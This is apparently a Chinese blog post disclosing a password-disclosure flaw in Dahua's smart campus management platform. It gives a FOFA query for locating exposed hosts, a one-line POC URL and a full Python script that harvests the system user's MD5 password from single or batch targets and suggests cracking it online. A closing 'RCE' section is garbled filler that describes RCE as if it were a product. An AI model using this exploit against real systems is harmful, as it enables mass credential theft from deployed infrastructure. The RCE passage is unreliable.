大华智慧园区综合管理平台系统存在多处漏洞

漏洞描述

大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

FOFA

app="dahua-智慧园区综合管理平台"

任意密码读取POC

IP+/admin/user_getUserInfoByUserName.action?userName=system

python脚本

# _*_ coding:utf-8 _*_
# @Time : 2023/9/17 21:29
# @Author: 为赋新词强说愁
 
 
import requests
import argparse
from datetime import datetime
 
requests.packages.urllib3.disable_warnings()
 
 
def usage():
    print('''
    +-----------------------------------------------------------------+
                微信公众号    网络安全透视镜 
    此脚本仅用于学习或系统自检查
    使用方法:
        单个 python3 dahuaSystemPwdRead.py -u url[例 http://127.0.0.1:8080]
        批量 python3 dahuaSystemPwdRead.py -f filename
    +-----------------------------------------------------------------+         
 
    根据《中华人民共和国刑法》规定,违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。
 
    ''')
 
 
# proxies = {'http':'http://127.0.0.1:10808}
 
def exp(check_url,resp_json):
    select = input("是否读取system用户密码(是:1,否:0):")
    #usage()
 
    if select == "1":
        print(f"{check_url}  system用户md5密码为:{resp_json['loginPass']},可前往https://www.cmd5.com 进行解密")
        print('\n')
    elif select == "0":
        exit()
    else:
        print("请重新输入正确选项")
 
def save_file(url,password):
    now = datetime.now()
    filepath = now.strftime("%Y-%m-%d %H")+'_result.txt'
    result = f"{url} system用户登录密码为\t{password}"
    with open(filepath,mode='a',encoding='utf-8') as f:
        f.write(result+'\n')
 
def poc(check_url,flag):
    url = check_url + "/admin/user_getUserInfoByUserName.action?userName=system"
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36",
    }
    now_poc = datetime.now()
    try:
        response = requests.get(url=url, headers=header, timeout=3, verify=False)
        # print(response.json())
        resp_json = response.json()
        response.close()
        if resp_json['loginPass'] != None:
            print(f'[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t漏洞存在')
        else:
            print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t漏洞不存在')
        if flag == 1:
            exp(check_url,resp_json)
        else:
            save_file(check_url,resp_json['loginPass'])
    except Exception as e:
        print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t无法访问,请检查目标站点是否存在')
 
 
def run(filepath):
    usage()
    flag = 0
    urls = [x.strip() for x in open(filepath, "r").readlines()]
    for line in urls:
        line = line.strip()
        if 'http' in line:
            url = line
        elif 'https' in line:
            url = line
        else:
            url = 'http://' + line
        poc(url,flag)
 
 
def main():
    parse = argparse.ArgumentParser()
    parse.add_argument("-u", "--url", help="python dahuaSystemPwdRead.py -u url")
    parse.add_argument("-f", "--file", help="python dahuaSystemPwdRead.py  -f file")
    args = parse.parse_args()
    url = args.url
    filepath = args.file
    if url is not None and filepath is None:
        flag = 1
        poc(url,flag)
    elif url is None and filepath is not None:
        run(filepath)
    else:
        usage()
 
 
if __name__ == '__main__':
    main()

运行

综合利用工具

大华智慧园区综合管理平台(RCE)是一种基于大数据和人工智能技术的智慧园区管理解决方案。该平台集成了多个子系统,包括智能安防、能源管理、楼宇自动化、智慧交通等,旨在提供全面的园区管理和优化,促进园区的可持续发展。 RCE平台通过监测和收集园区各个系统的数据,实现了全面的实时监控和管理。例如,通过智能安防子系统,可以对园区内的视频监控和入侵报警进行集中管理和分析,及时发现和应对安全事件。能源管理系统可以帮助园区实现能源使用的监测和调控,提高能源利用效率,减少能源浪费。楼宇自动化子系统可以实现对园区内各个建筑物的智能控制和设备管理,提高建筑物的舒适度和能源效率。智慧交通子系统则可以优化园区的交通流动性,减少交通堵塞和碰撞事故。 RCE平台还具有数据分析和预测功能,利用大数据和人工智能技术,对园区内各个子系统的数据进行分析和挖掘,提供决策支持和优化方案。例如,可以通过数据分析预测出园区能源的高峰和低谷,从而合理调控能源供应。还可以通过交通数据分析,优化园区的道路规划和交通流量,提高交通效率和安全性。 综上所述,大华智慧园区综合管理平台(RCE)通过集成不同子系统和应用,实现了园区的全面管理和优化,提高了园区的安全性、舒适度和效率。它是未来智慧城市建设的重要组成部分,也是推动城市可持续发展的重要工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值